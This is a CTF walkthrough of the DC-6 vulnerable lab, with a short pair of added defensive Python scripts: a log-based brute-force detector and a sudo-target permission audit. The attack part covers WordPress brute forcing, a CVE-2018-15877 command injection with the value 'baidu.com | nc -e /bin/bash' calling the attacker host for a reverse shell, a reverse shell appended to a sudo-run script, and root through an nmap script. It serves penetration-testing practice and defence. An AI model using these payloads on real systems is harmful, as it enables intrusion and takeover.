CTF: DC-6 Target Machine Attack and Defence

Target Machine Description

Description

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information

DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

Lab Environment

  • Attack host: Kali 2020, 172.25.0.69
  • Target: DC-6, MAC address 00:0c:29:90:0a:a3
    DC-6 download: https://www.vulnhub.com/entry/dc-6,315/
    Edit the local hosts file as the target description instructs; the hosts file lives at:
  • Windows: C:\Windows\System32\drivers\etc
  • Linux: /etc/hosts



0x01 Host Discovery

An ARP sweep with netdiscover shows the DC-6 target (the entry with MAC 00:0c:29:90:0a:a3) at 172.25.0.68.

kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                        
                                                                                      
 17 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1020                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.25.0.1      00:50:56:c0:00:08      9     540  VMware, Inc.                       
 172.25.0.2      00:50:56:f8:42:a0      4     240  VMware, Inc.                       
 172.25.0.100    00:50:56:f6:d0:4b      2     120  VMware, Inc.                       
 172.25.0.68     00:0c:29:90:0a:a3      2     120  VMware, Inc.  

0x02 Port Scan

kali@kali:~$ nmap -A -p- 172.25.0.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 05:33 EST
Nmap scan report for wordy (172.25.0.68)
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds

0x03 Information Gathering

Since DC-6 is built on the WordPress CMS, it is scanned directly with wpscan.
Parameter usage: -e vp,u enumerates vulnerable plugins (vp) and users (u); --plugins-detection mixed uses both passive and aggressive plugin detection.
The scan yields the back-end usernames and the admin login page; the usernames are saved to a user dictionary user.dic in preparation for the password brute force in the next step.

kali@kali:~$ wpscan --url http://wordy -e vp,u --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Wed Feb 26 05:38:53 2020

Interesting Finding(s):

[+] http://wordy/
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <=====> (2206 / 2206) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Feb 26 05:39:09 2020
[+] Requests Done: 2274
[+] Cached Requests: 6
[+] Data Sent: 518.972 KB
[+] Data Received: 974.406 KB
[+] Memory used: 223.238 MB
[+] Elapsed time: 00:00:16

0x04 Back-end Login Form Brute Force

Build the password dictionary following the hint in the DC-6 description: filter rockyou.txt down to the lines containing k01.

gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt    # keep only the lines containing k01

Brute-force the passwords with wpscan:
wpscan --url http://wordy -U user.dic -P passwords.txt
Result: Username: mark, Password: helpdesk01
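Seen from the server side, the wpscan run above is a burst of POST requests to /wp-login.php from a single client, which stands out in the Apache access log. The following script is an added example written for this page, not part of the original writeup: it parses constructed combined-format log lines (the sample lines are made up, not captured from DC-6) and reports any client that sends more than a threshold of login POSTs inside a sliding time window. Note that WordPress answers a failed login with status 200 and the re-rendered form, so the count of POSTs, not the status code, is the signal.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" access-log format, which the Debian Apache on DC-6 writes by default.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_login_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {client_ip: peak_posts} for clients that sent at least `threshold`
    POSTs to wp-login.php inside any `window_seconds` sliding window.

    Only the POST count is used: a failed WordPress login returns 200 with the
    form re-rendered, so the status code carries no signal here.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    peak = defaultdict(int)       # ip -> largest window count seen so far
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].startswith("/wp-login.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        # Drop timestamps that fell out of the window (log lines arrive in time order).
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


def build_sample_log():
    """Constructed sample lines (not captured from DC-6): a 15-attempt burst from
    the attack host, plus ordinary traffic from another client."""
    burst = ('172.25.0.69 - - [26/Feb/2020:05:45:{sec:02d} -0500] '
             '"POST /wp-login.php HTTP/1.1" 200 3218 "-" "WPScan v3.7.6"')
    lines = [burst.format(sec=s) for s in range(15)]
    lines.append('172.25.0.100 - - [26/Feb/2020:05:45:20 -0500] '
                 '"GET /index.php/feed/ HTTP/1.1" 200 1124 "-" "Mozilla/5.0"')
    lines.append('172.25.0.100 - - [26/Feb/2020:05:45:21 -0500] '
                 '"POST /wp-login.php HTTP/1.1" 200 3218 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, n in find_login_bruteforce(build_sample_log()).items():
        print("%s: %d login POSTs within 60s" % (ip, n))
```

Run against a real log with `find_login_bruteforce(open("/var/log/apache2/access.log"))`; the threshold and window are the knobs to tune, and the same counting logic is what a fail2ban jail for wp-login.php does under the hood.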

0x05 Vulnerability Discovery

Log in to the back end with the credentials obtained by brute force.


After logging in, the site turns out to have the activity_monitor plugin (Plainview Activity Monitor) installed. Approach: look up known vulnerabilities in that plugin.
It is affected by CVE-2018-15877, a remote command execution vulnerability.
Exploitation: use Burp to capture the HTTP request that http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools sends when an IP is entered and Lookup is clicked, then change the value of the ip parameter to baidu.com | nc -e /bin/bash 172.25.0.69 1234

In mark's home directory, the file stuff/things-to-do.txt contains graham's password.

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$ 

0x06 sudo Privilege Escalation

Connect as graham over SSH and check the sudo permissions.

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

Approach: append an nc reverse shell to the backups.sh script to obtain a shell as jens.

graham@dc-6:/home/jens$ cat >>backups.sh <<EOF
> nc -e /bin/bash 172.25.0.69 6666
> EOF
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh 
tar: Removing leading `/' from member names
kali@kali:~$ nc -lvvp 6666
listening on [any] 6666 ...
connect to [172.25.0.69] from wordy [172.25.0.68] 33638
python -c 'import pty;pty.spawn("/bin/bash")'
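The jump from graham to jens works only because the script that sudo lets graham run as jens is writable by graham: sudo trusts the path in the rule, not the content behind it. The following audit is an added example for this page, not part of the writeup or of DC-6, and uses only mode bits and ownership so it runs on any Unix system. It flags a sudo target that is group- or world-writable, owned by someone other than root or the run-as user, or sitting in a directory where others could replace it. The demo files it builds are constructed; the writeup shows only that graham could append to backups.sh, so the group-writable mode used below is an assumption about how that was possible.

```python
import os
import stat
import tempfile


def audit_sudo_target(path, runas_uid=None):
    """Return a list of findings for a file that a sudoers rule lets users execute.

    runas_uid is the uid the rule runs the command as (jens in the writeup);
    ownership by root or by that user is accepted, anything else is reported.
    """
    findings = []
    st = os.stat(path)
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        findings.append("target is world-writable")
    if mode & stat.S_IWGRP:
        findings.append("target is group-writable")
    if st.st_uid != 0 and (runas_uid is None or st.st_uid != runas_uid):
        findings.append("target owned by uid %d, neither root nor the run-as user" % st.st_uid)
    # A writable parent directory lets anyone swap the script for another file of the
    # same name, unless the sticky bit restricts deletion to the owner.
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & (stat.S_IWOTH | stat.S_IWGRP) and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is writable by others: target could be replaced")
    return findings


def demo():
    """Build two constructed scripts in a private temp dir and audit both.

    Returns (findings_for_loose, findings_for_tight). The loose copy is
    group-writable, an assumed stand-in for the backups.sh mode on DC-6;
    the tight copy is the corrected 0755.
    """
    d = tempfile.mkdtemp()          # created with mode 0700, so the parent check passes
    me = os.getuid()
    loose = os.path.join(d, "backups_loose.sh")
    tight = os.path.join(d, "backups_tight.sh")
    for p in (loose, tight):
        with open(p, "w") as f:
            f.write("#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n")
    os.chmod(loose, 0o775)          # group members can append (assumed DC-6 situation)
    os.chmod(tight, 0o755)          # only the owner can modify
    return audit_sudo_target(loose, runas_uid=me), audit_sudo_target(tight, runas_uid=me)


if __name__ == "__main__":
    loose, tight = demo()
    print("loose:", loose or "no findings")
    print("tight:", tight or "no findings")
```

To check a live rule, pass the command path from `sudo -l` and the uid of the run-as user (for example `audit_sudo_target("/home/jens/backups.sh", runas_uid=pwd.getpwnam("jens").pw_uid)`); an empty list means the file itself is not the weak point, though the rule may still be unsafe for other reasons, such as the command interpreting scripts or arguments of the caller's choosing.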

Check which commands jens can run with sudo.

jens@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Approach: have nmap run a script that spawns a shell, switching to root.

jens@dc-6:~$ echo 'os.execute("/bin/sh")' > getroot.nse
echo 'os.execute("/bin/sh")' > getroot.nse
jens@dc-6:~$ sudo nmap --script getroot.nse
sudo nmap --script getroot.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-26 22:04 AEST
# whoami
root
# ls
backups.sh  backups.tar.gz  getroot.nse
# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


# 

Privilege escalation through nmap gives root, and the flag is captured.
